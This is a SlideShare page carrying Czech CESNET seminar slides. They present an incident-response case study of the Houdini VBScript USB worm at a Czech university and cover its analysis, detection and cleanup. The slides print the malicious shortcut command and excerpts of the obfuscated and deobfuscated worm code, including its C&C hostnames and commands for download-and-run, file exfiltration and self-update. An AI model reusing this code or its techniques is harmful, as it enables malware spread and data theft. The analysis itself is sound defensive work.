SlideShare uma empresa Scribd logo

Malware Houdiny

CESNET
CESNET

Prezentace ze Semináře o bezpečnosti sítí a služeb, Praha, 9. 2. 2016

Internet
1 de 30
Baixar para ler offline
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 1 Malware Houdiny Případová studie Aleš Padrta (za ZČU spolupracoval: Petr Žák)
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 2 Úvodní slovo ● Ukázka spolupráce ● Univerzitní CSIRT & forenzní laboratoř ● Západočeská univerzita v Plzni (WEBnet Incident Response Team) ● FLAB - Forenzní laboratoř CESNET ● Schéma ● CSIRT řeší incident ● CSIRT potřebuje informace ● Forenzní laboratoř poskytne informace ● CSIRT zužitkuje informace
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 3 Dějství I: Stav na ZČU
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 4 Upozornění na problém ● E-mail uživatelské podpoře CIV ZČU (IT oddělení) ● Uživatelé zjistili jen náhodou ● Kopírování v Průzkumníkovi (Explorer) ● V novém umístění byli jen zástupci (Shortcuts) Dobry den, prosím Vás o pomoc. Objevil se mi tu vir. Ze všech adresářů a souborů udělá na externích úložištích zástupce. Děkuji za pomoc.
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 5 Analýza provedená CSIRT ● Flashdisk ● Obsahuje i původní soubory (Atribut „skrytý soubor“) ● Obsahuje zástupce ● Stejná jména i ikony jako původní soubory ● Otevře původní soubor + soubor „Microsoft Excel.WsF“ ● Obsahuje soubor „Microsoft Excel.WsF“ ● Hledání informací ● http://www.en.usbfix.net/2014/03/remove-shortcut- virus-usb/ ● Malware: Dinihou – Houdini Worm.VBScript
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 6 Reakce CSIRT ● Postup pro infikované flashdisky ● „Obnova“ uživatelských dat ● Zrušení atributu „skrytý soubor“ ● Smazání zástupců ● Smazání souboru „Microsoft Excel.WsF“ ● Napadené stanice ● Záznam v registrech ● Neznámá činnost malware  reinstalace attrib -h -r -s /s /d *.* wscript.exe //B "C:Users… Microsoft Office Microsoft Excel.WsF"
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 7 Reakce CSIRT ● Preventivní opatření ● Problematická ● Stanice ve správě IT oddělení ● Používaný antivirový program nezachytí ● Zavedeno blokovaní souborů *.WsF ● Ostatní stanice ● Ve správě „uživatelů“ ● Studenti ● Velká migrace USB zařízení
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 8 Stále kvoká, stále kvoká, ... ● Výskyt dalších případů ● Uživatelé stanice mimo správu IT oddělení ● Studenti a jejich flashdisky ● Opakované nákazy ● Potřeba hlubší analýzy ● Nedostatek vlastních kapacit ● Hlavně nedostatek času ● Zadání analýzy externímu subjektu ● CESNET FLAB
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 9 Dějství II: Analýza malware
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 10 Zadání pro FLAB ● Zadání ● Malware na flashdisku pro každý soubor vytvoří zástupce a původní soubor schová, takže uživatel spouští (dvouklikem) zástupce, který kromě vlastního souboru spustí ještě VBScript, který zajišťuje šíření malware a asi i další aktivitu. ● Otázky k zodpovězení 1) Jakou funkcionalitou malware disponuje? 2) Lze přítomnost malware poznat podle síťového chování? 3) Jak nastavit pravidla pro antivirový systém, aby blokoval tento malware?
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 11 Zadání pro FLAB ● Podklady pro analýzu ● Předány elektronicky dva soubory ● Přípona „.norun“ ● Zamezení neúmyslnému spuštění ● Microsoft Excel.WsF.norun ● Malware nalezený na napadeném flashdisku ● Evidenční číslo 001 ● IMG_2402.lnk.norun ● Jeden ze zástupců vytvořený malwarem na napadeném flashdisku ● Evidenční číslo 002
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 12 Analýza zástupce (ev. č. 002) ● Položka „cíl“ zástupce: ● Po odstranění cls (clear screen): ● Zajišťuje spuštění malware – každé otevření souboru C:WINDOWSsystem32cmd.exe /c cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start IMG_2402.JPG&cls&cls&cls&cls&cls&cls&cls&cls&cls& cls&cls&start Microsoft" "Excel.WsF&cls&cls&cls& cls&cls&cls&cls&cls&cls&cls&cls&exit start IMG_2402.JPG //původní soubor start Microsoft" "Excel.WsF //malware exit //zavření okna
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 13 Analýza zástupce (ev. č. 002) ● Využití výchozího nastavení ● „Nezobrazovat skryté soubory“ = ano, zatajit existenci ● „Skrývání přípon známých typů“ = ano, zatajit informaci Dokument.docx Dokument.docx Dokument.lnk Microsoft" "Excel.WsF Skrytý soubor Zástupce Čistý flashdisk Napadený flashdisk Malware
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 14 Analýza malware (ev. č. 001) ● Obsah souboru – obfuskovaný VB Script <package> <job id="manage-bde"> <script language="VBScript"> Dim nTWAAKaqMncGOLEYPcXDTqcWJAj:nTWAAKaqMncGOLEYPcXDTqcWJAj="kyz NMWZrwnYxTfZmaVff":If nTWAAKaqMncGOLEYPcXDTqcWJAj="kyzNMWZrwnYxT fZmaVff"Then:End If:Dim LzcAEAXYFzttkGGoBj:LzcAEAXYFzttkGGoBj="v uWeIryKEArjjHfVnrNb":If ... If:LB="}}}!}}!}?}^}{}|+?^}{}%^}^-}}|-]^^}}|-]-^+?|!^|-_|}}|}^/| -^‫^|؟|-_*_?{/{-{!^[^[|-^[_}-*{_||-^[^]^[|?^/-]|?^{{/-{{}/{[_*{؟‬ ... fUNCTioN FRANCE(VIANA):Dim ZxyjgajpHRCEFtq ... GRECE=FRANCE(20+20+9)TO(LONDON(BOSNA)/FRANCE(10*5)) ... </script> </job> </package>
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 15 Analýza malware (ev. č. 001) ● Deobfuskace – varianta „hrubá síla“ ● Rozebrat činnost funkcí a získat kód ● To opravdu není dobrý nápad ... ● Deobfuskace – varianta „jemný intelekt“ ● Sestavení a spuštění kódu je realizováno funkcí ● Místo spuštění necháme výsledný kód jen zobrazit :%s/ExecuteGlobal/WScript.echo/ ● Uložení výsledku cscript echo_script.WsF > unpacked1.Wsf ExeCuTeGloBal(ITALI(FRANCE(50-30+17),LB))
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 16 Analýza malware (ev. č. 001) ● Výsledek po deobfuskaci – další (jiná) obfuskace ● Stejný postup (náhrada GlobalExecute za Wscript.echo) cscript echo_unpacked1.WsF > unpacked2.Wsf <package> <job id="manage-bde"> <script language="VBScript"> COLOMBIA=VINSULA(USA("=oVeqCcWem/x{}GEOXXeXy+FqeXZXmW*mSG#IWH{LbG {LeGwmSOzzXOJi/Vo}/SWFmWXOEG#QcZsCcWem/x{/NNcVNzXVMqWGxFc/zK/X/Q DotX{fRXELNOELicWOzzXOJi/VPL{WyqWGR}RLu}/SWFmWXOEG/FyW-MXNxFc/zK/X /qWGRmlLuLDYR-SvzMXS!XEXo/Tvxi}/ .... +cHr(CByte("&H"&Mid(PANAMA,3,2)))+cHr(CByte("&H"&Mid(PANAMA,5,2))): PUREAU=PUREAU+Left(CANADA,KOUBA):Next:UREGWAY=PUREAU:End Function:F unction USA(HINDORAS):Dim i:For i=1 To Len(HINDORAS):USA=Mid(HINDOR AS,i,1)&USA:next:End Function </script> </job> </package>
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 17 Analýza malware (ev. č. 001) ● Výsledek po druhé deobfuskaci – už zase (!) ● Stejný postup (náhrada GlobalExecute za Wscript.echo) cscript echo_unpacked2.WsF > unpacked3.Wsf <package> <job id="manage-bde"> <script language="VBScript"> TUNISIA="!{]*!#/-!#*{{!#/-![=|!#/#/!#*=|!{-[{!#*{{!{-[{![=|!#*=|! #/#/!#**!{#-|!#]/|!#/#/![=|!#*-*!#/#/!#[/*!{-//!{]*!#/-!{]*!#/-!# ... FOR ALGERIE=1 TO UboUnD(TUNISIA):MAROCOO=MAROCOO+cHr(TUNISIA(ALGER IE)/(25+25-32)):NEXT:ExecuteGlobal(MAROCOO) </script> </job> </package>
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 18 Analýza malware (ev. č. 001) ● Výsledek po třetí deobfuskaci – konečně čitelný kód On eRrOr ReSuMe NeXt dIm Az sET Az = WsCriPt.CreAtEoBjEcT("wscript.shell") dIm Aw sET Aw = CreAtEoBjEcT("scripting.filesystemobject") dIm Av sET Av = CreAtEoBjEcT("msxml2.xmlhttp") Ay = ArRaY ("maroco.linkpc.net:855", "maroco.myq-see.com:855","maroco.redirectme.net:855") Ax = Az.ExPaNdEnViRoNmEnTsTrInGs ("%appdata%") &"Microsoft Office" Aw.CreateFolder Ax Au = TRue At = True Ar = "Microsoft Excel.WsF" ...
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 19 Analýza malware (ev. č. 001) ● Analýza kódu malware ● Iterativní činnost ● Seznam proměnných s poznámkami ● Seznam funkcí s poznámkami ● Odstraňování „eMoSTyLu z NáZVůprOMěNných“ ● Skript ● Poměrně krátký – necelých 500 řádek  kompletní analýza funkčnosti ● Vyhledání odpovědí na otázky
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 20 Analýza malware (ev. č. 001) 1) Jakou funkcionalitou malware disponuje? ● Persistence ● Spuštění přes zástupce na médiu ● Instalace na stanici ● Rozšíření na „removable“ média ● Po instalaci na stanici (registrový klíč) ● Průběžné rozšiřování na „removable“ média ● Komunikace s C&C ● Šíření ● Přes „removable“ média – nutná součinnost uživatele fOr EACH Drive In Aw.Drives ... If Drive.Drivetype = 1 then ... '* type 1 = Removable
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 21 Analýza malware (ev. č. 001) ● Zahájení komunikace s C&C ● V intervalu 5000ms (5s) ● Rozpoznávané pokyny z C&C serveru ● Aktualizace skriptu (tj. možná změna funkcionality) ● Změna intervalu komunikace s C&C ● Stáhnout soubor z C&C a spustit jej ● Odeslat soubor ze systému na C&C ● Odinstalování ze systému (tj. mazání stop po útoku) ● Spuštění lokální příkazu jako parametr cmd.exe (v analyzované verzi nefunkční, vývojová chyba)
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 22 Analýza malware (ev. č. 001) ● Ukázka části kódu – schopnosti malware SeLeCt case Ao (0) case "excecute" An = Ao (1) Bd An '* ??? case "update" '* nahrazeni obsahu lokalniho skriptu parametrem An = Ao (1) Al.ClOse sET Al = Aw.OpEnTeXtFiLe (Ax & Ar ,2, FaLsE) Al.WriTe An Al.ClOse Az.RuN "WScript.exe //B " & cHr((17+17)) & Ax & Ar & cHr((17+17)) WScript.QuIt case "uninstall" Bi '* call Bi: uninstall case "send" Bn Ao (1),Ao (2) '*call Bn (param2_filename, param3_path) case "site-send" Bh Ao (1),Ao (2) '*call Bh (param2_getparam, param3_filename) case "recv"' An = Ao (1) Be (An) '*call Be (param2): odeslani zadaneho souboru na CaC case "Sleep" '* nastaveni noveho intervalu cekani v cyklu An = Ao (1) Sleep = EVal (An) eND SeLeCt
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 23 Analýza malware (ev. č. 001) 2) Lze přítomnost malware poznat podle síťového chování? ● Ano, každých 5s komunikuje s C&C ● Port 855, C&C udáno jako hostname ● maroco.linkpc.net:855 ● maroco.myq-see.com:855 ● maroco.redirectme.net:855 ● Zjištění IP adres v historii? ● Passive DNS
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 24 Analýza malware (ev. č. 001) 3) Jak nastavit pravidla pro antivirový systém, aby blokoval tento malware? ● Konzultováno s WEBnet Incident Response Team ● FLAB nemá příslušný SW ● Zabezpečení koncových stanic ZČU ● Dodavatel XxXxxx ● WsF je v kategorii „Script“ - nelze globálně zakázat ● Jediná možnost – ruční pravidlo „blokování *.WsF“
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 25 Dějství III: Využití informací
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 26 Nalezení napadených zařízení ● Síťová komunikace ● Port 855, IP adresy odpovídající daným hostname ● Identifikace stanic, uživatelů ● Vytěžení uživatelů stanic ● Jaké flashdisky používáte? ● Kam jste své flashdisky připojoval? ● Kdo připojoval své flashdisky k Vašemu zařízení? ● Identifikace dalších uživatelů ● Mimo ZČU (např. kopírovací centrum)
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 27 Reakce a prevence ● Připraveny „nápravné“ skripty ● Vychází z deobfuskovaného kódu (reverzní postup) ● uninstall.vbs – odstranění malware ze systému ● clean.vbs – odstranění nákazy z „removable“ médií ● Pro aktuálně připojené – možno snadno vyčistit ● Instrukce pro IT HelpDesk ● Připravena webová stránka pro uživatele ● Postup + skripty ke stažení ● Úprava pravidel AV systému
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 28 Univerzitní sítí to nekončí
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 29 Univerzitní sítí to nekončí Dobrý den. Měl bych na Vás velkou prosbu. Nejsem však student vaší školy. Našel jsem odkaz: http://support.zcu.cz/.. Manželka "přitáhla" ze školy tento trojan a práskla to do notebooku a PC v práci. Mohl bych Vás požádat o zpřístupnění, či odkaz na stažení tohoto skriptu. Moc děkuji.
2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 30 Dotazy a diskuse

Recomendados

Debugování s XDebug
Debugování s XDebugDebugování s XDebug
Debugování s XDebug
Taste Medio
 
Cambados Albariño 2015
Cambados Albariño 2015 Cambados Albariño 2015
Cambados Albariño 2015
Miguel Angel Fenández Cornejo
 
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
EAE Business School
 
92期临床药学专业药物毒理学试题(a)
92期临床药学专业药物毒理学试题(a)92期临床药学专业药物毒理学试题(a)
92期临床药学专业药物毒理学试题(a)
sugeladi
 
Безпечний Інтернет
Безпечний ІнтернетБезпечний Інтернет
Безпечний Інтернет
НВО "Школа-ліцей №19"
 
cv- Yugal Kothari
cv- Yugal Kotharicv- Yugal Kothari
cv- Yugal Kothari
Yugal Kothari
 
Instruction for installing scanner under xp
Instruction for installing scanner under xpInstruction for installing scanner under xp
Instruction for installing scanner under xp
Santos Turrones
 
Generazione Web Lombardia
Generazione Web LombardiaGenerazione Web Lombardia
Generazione Web Lombardia
itlc
 

Recomendados

Debugování s XDebug
Debugování s XDebugDebugování s XDebug
Debugování s XDebug
Taste Medio
 
Cambados Albariño 2015
Cambados Albariño 2015 Cambados Albariño 2015
Cambados Albariño 2015
Miguel Angel Fenández Cornejo
 
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
Pere Brachfield, profesor de EAE Bussiness School habla de las Sanciones al m...
EAE Business School
 
92期临床药学专业药物毒理学试题(a)
92期临床药学专业药物毒理学试题(a)92期临床药学专业药物毒理学试题(a)
92期临床药学专业药物毒理学试题(a)
sugeladi
 
Безпечний Інтернет
Безпечний ІнтернетБезпечний Інтернет
Безпечний Інтернет
НВО "Школа-ліцей №19"
 
cv- Yugal Kothari
cv- Yugal Kotharicv- Yugal Kothari
cv- Yugal Kothari
Yugal Kothari
 
Instruction for installing scanner under xp
Instruction for installing scanner under xpInstruction for installing scanner under xp
Instruction for installing scanner under xp
Santos Turrones
 
Generazione Web Lombardia
Generazione Web LombardiaGenerazione Web Lombardia
Generazione Web Lombardia
itlc
 
sistemas neumaticos simbologia
sistemas neumaticos simbologiasistemas neumaticos simbologia
sistemas neumaticos simbologia
Francisco Gonzalez
 
Ccnn 2
Ccnn 2Ccnn 2
Ccnn 2
Adriana Marysol Pazmiño Chimbo
 
commodity market pdf
commodity market pdfcommodity market pdf
commodity market pdf
muniswamy Paluru
 
Afro – latin american and popular music
Afro – latin american and popular musicAfro – latin american and popular music
Afro – latin american and popular music
Rona Jane Blanco
 
COMPLETE WORK- MEDIA JUNKIE
COMPLETE WORK- MEDIA JUNKIECOMPLETE WORK- MEDIA JUNKIE
COMPLETE WORK- MEDIA JUNKIE
Chelsea Kate Parkin
 
March workshop: flipping classrooms
March workshop: flipping classroomsMarch workshop: flipping classrooms
March workshop: flipping classrooms
Sofia Papadimitriou
 
20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně
Jiří Mareš
 
Node-RED
Node-REDNode-RED
Node-RED
Adam Hořčica
 
Nízkoúrovňové programování
Nízkoúrovňové programováníNízkoúrovňové programování
Nízkoúrovňové programování
Martin Děcký
 
Ochrana proti Zero Day útokům typu WannaCry a Petya
Ochrana proti Zero Day útokům typu WannaCry a PetyaOchrana proti Zero Day útokům typu WannaCry a Petya
Ochrana proti Zero Day útokům typu WannaCry a Petya
MarketingArrowECS_CZ
 
McAfee Adaptive threat intelligence i ve virtuálním prostředí
McAfee Adaptive threat intelligence i ve virtuálním prostředí McAfee Adaptive threat intelligence i ve virtuálním prostředí
McAfee Adaptive threat intelligence i ve virtuálním prostředí
MarketingArrowECS_CZ
 
Continuous Integration
Continuous IntegrationContinuous Integration
Continuous Integration
danielkolman
 
Odpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnostOdpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnost
chaplin06
 
O2 Firewally nové generace
O2 Firewally nové generaceO2 Firewally nové generace
O2 Firewally nové generace
Milan Petrásek
 
Ondřej David: Zabezpečení Androidu na úrovni hardwaru
Ondřej David: Zabezpečení Androidu na úrovni hardwaruOndřej David: Zabezpečení Androidu na úrovni hardwaru
Ondřej David: Zabezpečení Androidu na úrovni hardwaru
mdevtalk
 
FLAB: Forenzní laboratoř
FLAB: Forenzní laboratořFLAB: Forenzní laboratoř
FLAB: Forenzní laboratoř
CESNET
 
Trendy a nové možnosti test automation
Trendy a nové možnosti test automationTrendy a nové možnosti test automation
Trendy a nové možnosti test automation
Ondřej Machulda
 
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Ondřej Machulda
 
Strasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikacíStrasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikací
René Stein
 
Zmrakování pružné včely
Zmrakování pružné včelyZmrakování pružné včely
Zmrakování pružné včely
fersman
 
Slovak Sun Training Day 2010 - DTrace
Slovak Sun Training Day 2010 - DTraceSlovak Sun Training Day 2010 - DTrace
Slovak Sun Training Day 2010 - DTrace
Martin Cerveny
 
4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware
pisaceku
 

Mais conteúdo relacionado

Destaque

Destaque (6)

sistemas neumaticos simbologia
sistemas neumaticos simbologiasistemas neumaticos simbologia
sistemas neumaticos simbologia
 
Ccnn 2
Ccnn 2Ccnn 2
Ccnn 2
 
commodity market pdf
commodity market pdfcommodity market pdf
commodity market pdf
 
Afro – latin american and popular music
Afro – latin american and popular musicAfro – latin american and popular music
Afro – latin american and popular music
 
COMPLETE WORK- MEDIA JUNKIE
COMPLETE WORK- MEDIA JUNKIECOMPLETE WORK- MEDIA JUNKIE
COMPLETE WORK- MEDIA JUNKIE
 
March workshop: flipping classrooms
March workshop: flipping classroomsMarch workshop: flipping classrooms
March workshop: flipping classrooms
 

Semelhante a Malware Houdiny

20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně
Jiří Mareš
 
Odpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnostOdpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnost
chaplin06
 
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Ondřej Machulda
 
Strasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikacíStrasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikací
René Stein
 
4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware
pisaceku
 

Semelhante a Malware Houdiny (20)

20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně20110511 Vývoj software - produktivně, efektivně, kvalitně
20110511 Vývoj software - produktivně, efektivně, kvalitně
 
Node-RED
Node-REDNode-RED
Node-RED
 
Nízkoúrovňové programování
Nízkoúrovňové programováníNízkoúrovňové programování
Nízkoúrovňové programování
 
Ochrana proti Zero Day útokům typu WannaCry a Petya
Ochrana proti Zero Day útokům typu WannaCry a PetyaOchrana proti Zero Day útokům typu WannaCry a Petya
Ochrana proti Zero Day útokům typu WannaCry a Petya
 
McAfee Adaptive threat intelligence i ve virtuálním prostředí
McAfee Adaptive threat intelligence i ve virtuálním prostředí McAfee Adaptive threat intelligence i ve virtuálním prostředí
McAfee Adaptive threat intelligence i ve virtuálním prostředí
 
Continuous Integration
Continuous IntegrationContinuous Integration
Continuous Integration
 
Odpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnostOdpoledne se Seznamem II - Provozní bezpečnost
Odpoledne se Seznamem II - Provozní bezpečnost
 
O2 Firewally nové generace
O2 Firewally nové generaceO2 Firewally nové generace
O2 Firewally nové generace
 
Ondřej David: Zabezpečení Androidu na úrovni hardwaru
Ondřej David: Zabezpečení Androidu na úrovni hardwaruOndřej David: Zabezpečení Androidu na úrovni hardwaru
Ondřej David: Zabezpečení Androidu na úrovni hardwaru
 
FLAB: Forenzní laboratoř
FLAB: Forenzní laboratořFLAB: Forenzní laboratoř
FLAB: Forenzní laboratoř
 
Trendy a nové možnosti test automation
Trendy a nové možnosti test automationTrendy a nové možnosti test automation
Trendy a nové možnosti test automation
 
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
Funkční testování – chybějící vrchol pyramidy (WebExpo 2016)
 
Strasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikacíStrasti a slasti vývoje wp7 aplikací
Strasti a slasti vývoje wp7 aplikací
 
Zmrakování pružné včely
Zmrakování pružné včelyZmrakování pružné včely
Zmrakování pružné včely
 
Slovak Sun Training Day 2010 - DTrace
Slovak Sun Training Day 2010 - DTraceSlovak Sun Training Day 2010 - DTrace
Slovak Sun Training Day 2010 - DTrace
 
4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware4320 vzdaleny pristup_k_serveru_net_ware
4320 vzdaleny pristup_k_serveru_net_ware
 
Arduino naplno (Arduino Day 2015)
Arduino naplno (Arduino Day 2015)Arduino naplno (Arduino Day 2015)
Arduino naplno (Arduino Day 2015)
 
TNPW2-2011-06
TNPW2-2011-06TNPW2-2011-06
TNPW2-2011-06
 
Diplomka
DiplomkaDiplomka
Diplomka
 
Diplomka2
Diplomka2Diplomka2
Diplomka2
 

Mais de CESNET

A little talk_about_sane_progress
A little talk_about_sane_progressA little talk_about_sane_progress
A little talk_about_sane_progress
CESNET
 

Mais de CESNET (20)

Bezpečnost síťové části e-Infrastruktury CESNET
Bezpečnost síťové části e-Infrastruktury CESNETBezpečnost síťové části e-Infrastruktury CESNET
Bezpečnost síťové části e-Infrastruktury CESNET
 
Útoky na DNS
Útoky na DNSÚtoky na DNS
Útoky na DNS
 
Mentat a Warden: Sběr a zpracování dat z bezpečnostních nástrojů
Mentat a Warden: Sběr a zpracování dat z bezpečnostních nástrojůMentat a Warden: Sběr a zpracování dat z bezpečnostních nástrojů
Mentat a Warden: Sběr a zpracování dat z bezpečnostních nástrojů
 
Analýza dat z Wardenu
Analýza dat z WardenuAnalýza dat z Wardenu
Analýza dat z Wardenu
 
SABU: Sdílení a analýza bezpečnostních událostí
SABU: Sdílení a analýza bezpečnostních událostíSABU: Sdílení a analýza bezpečnostních událostí
SABU: Sdílení a analýza bezpečnostních událostí
 
PRedikce a Ochrana před Kybernetickými Incidenty
PRedikce a Ochrana před Kybernetickými IncidentyPRedikce a Ochrana před Kybernetickými Incidenty
PRedikce a Ochrana před Kybernetickými Incidenty
 
Cef 2014 opening
Cef 2014 openingCef 2014 opening
Cef 2014 opening
 
Strategy and innovation_in_cef_networks
Strategy and innovation_in_cef_networksStrategy and innovation_in_cef_networks
Strategy and innovation_in_cef_networks
 
Fibre footprint-for-research-infrastructures
Fibre footprint-for-research-infrastructuresFibre footprint-for-research-infrastructures
Fibre footprint-for-research-infrastructures
 
Fibre spectrum sharing_for_rd_networks
Fibre spectrum sharing_for_rd_networksFibre spectrum sharing_for_rd_networks
Fibre spectrum sharing_for_rd_networks
 
A little talk_about_sane_progress
A little talk_about_sane_progressA little talk_about_sane_progress
A little talk_about_sane_progress
 
Představení e-Infrastruktury CESNET
Představení e-Infrastruktury CESNETPředstavení e-Infrastruktury CESNET
Představení e-Infrastruktury CESNET
 
Živé přenosy videa na konference, semináře, kulturní představení, apod. v tuz...
Živé přenosy videa na konference, semináře, kulturní představení, apod. v tuz...Živé přenosy videa na konference, semináře, kulturní představení, apod. v tuz...
Živé přenosy videa na konference, semináře, kulturní představení, apod. v tuz...
 
Prostředky spolupráce v reálném čase
Prostředky spolupráce v reálném časeProstředky spolupráce v reálném čase
Prostředky spolupráce v reálném čase
 
Forenzní laboratoř
Forenzní laboratořForenzní laboratoř
Forenzní laboratoř
 
PKI služby CESNETu
PKI služby CESNETuPKI služby CESNETu
PKI služby CESNETu
 
Antispam Gateway – pračka elektronické pošty
Antispam Gateway – pračka elektronické poštyAntispam Gateway – pračka elektronické pošty
Antispam Gateway – pračka elektronické pošty
 
Základní funkce MetaCentra a jejich využití
Základní funkce MetaCentra a jejich využitíZákladní funkce MetaCentra a jejich využití
Základní funkce MetaCentra a jejich využití
 
Datová úložiště CESNET
Datová úložiště CESNETDatová úložiště CESNET
Datová úložiště CESNET
 
Bezpečnost sítě CESNET2
Bezpečnost sítě CESNET2Bezpečnost sítě CESNET2
Bezpečnost sítě CESNET2
 

Malware Houdiny

  • 1. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 1 Malware Houdiny Případová studie Aleš Padrta (za ZČU spolupracoval: Petr Žák)
  • 2. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 2 Úvodní slovo ● Ukázka spolupráce ● Univerzitní CSIRT & forenzní laboratoř ● Západočeská univerzita v Plzni (WEBnet Incident Response Team) ● FLAB - Forenzní laboratoř CESNET ● Schéma ● CSIRT řeší incident ● CSIRT potřebuje informace ● Forenzní laboratoř poskytne informace ● CSIRT zužitkuje informace
  • 3. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 3 Dějství I: Stav na ZČU
  • 4. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 4 Upozornění na problém ● E-mail uživatelské podpoře CIV ZČU (IT oddělení) ● Uživatelé zjistili jen náhodou ● Kopírování v Průzkumníkovi (Explorer) ● V novém umístění byli jen zástupci (Shortcuts) Dobry den, prosím Vás o pomoc. Objevil se mi tu vir. Ze všech adresářů a souborů udělá na externích úložištích zástupce. Děkuji za pomoc.
  • 5. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 5 Analýza provedená CSIRT ● Flashdisk ● Obsahuje i původní soubory (Atribut „skrytý soubor“) ● Obsahuje zástupce ● Stejná jména i ikony jako původní soubory ● Otevře původní soubor + soubor „Microsoft Excel.WsF“ ● Obsahuje soubor „Microsoft Excel.WsF“ ● Hledání informací ● http://www.en.usbfix.net/2014/03/remove-shortcut- virus-usb/ ● Malware: Dinihou – Houdini Worm.VBScript
  • 6. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 6 Reakce CSIRT ● Postup pro infikované flashdisky ● „Obnova“ uživatelských dat ● Zrušení atributu „skrytý soubor“ ● Smazání zástupců ● Smazání souboru „Microsoft Excel.WsF“ ● Napadené stanice ● Záznam v registrech ● Neznámá činnost malware  reinstalace attrib -h -r -s /s /d *.* wscript.exe //B "C:Users… Microsoft Office Microsoft Excel.WsF"
  • 7. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 7 Reakce CSIRT ● Preventivní opatření ● Problematická ● Stanice ve správě IT oddělení ● Používaný antivirový program nezachytí ● Zavedeno blokovaní souborů *.WsF ● Ostatní stanice ● Ve správě „uživatelů“ ● Studenti ● Velká migrace USB zařízení
